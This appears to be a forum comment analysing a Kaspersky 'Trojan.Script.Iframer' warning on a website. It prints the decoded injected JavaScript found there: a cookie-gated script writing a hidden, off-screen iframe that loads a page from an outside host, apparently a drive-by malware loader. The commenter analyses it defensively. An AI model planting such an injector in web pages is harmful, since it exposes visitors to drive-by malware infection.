One of my Facebook friends got the kaspersky virus warning too. Apparently the message is "object infected HEUR:Trojan.Script.Iframer." Interesting...
There's a bit of funny looking obfuscated JS on the page. Poking around with it a bit, it seems to decode to:
What's odd is that exploit code is even present on the site, especially as the app doesn't really accept user input and so isn't vulnerable to some of the more common code injection paths. The script certainly doesn't appear in the version posted on github. I wonder if the host webserver was compromised by something else?

if(document.cookie.indexOf('cookien=enabled')==-1){document.write("<div style="position: absolute; left: -1996px; top: -2999px;"><iframe width="40" height="40" src="http://chicknercx43.chickenkiller.com/i.php?go=1"></iframe></div>"))document.cookie='cookien=enabled'}Fortunately, chicknercx43.chickenkiller.com comes back as a suspended account, so that page isn't actually serving anything, rendering the whole thing moot. If the site did exist, it probably contained another obfuscated script that would attempt to inject a Flash object, presumably one that exploits a known security vulnerability in the Flash Player (a good excuse to make sure your Flash Player is up to date).
